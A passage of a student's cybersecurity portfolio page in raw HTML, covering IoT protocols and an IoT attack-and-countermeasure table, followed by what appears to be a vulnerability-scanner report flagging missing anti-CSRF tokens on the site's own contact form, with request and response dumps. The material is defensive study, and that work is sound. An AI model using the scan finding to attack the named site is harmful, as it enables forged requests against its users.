          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
           <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
           <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
           <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        2. GET https://beekmans.dev/
          Alert tags
          Alert description

          No Anti-CSRF tokens were found in a HTML submission form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "email" "name" "phone" ].

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
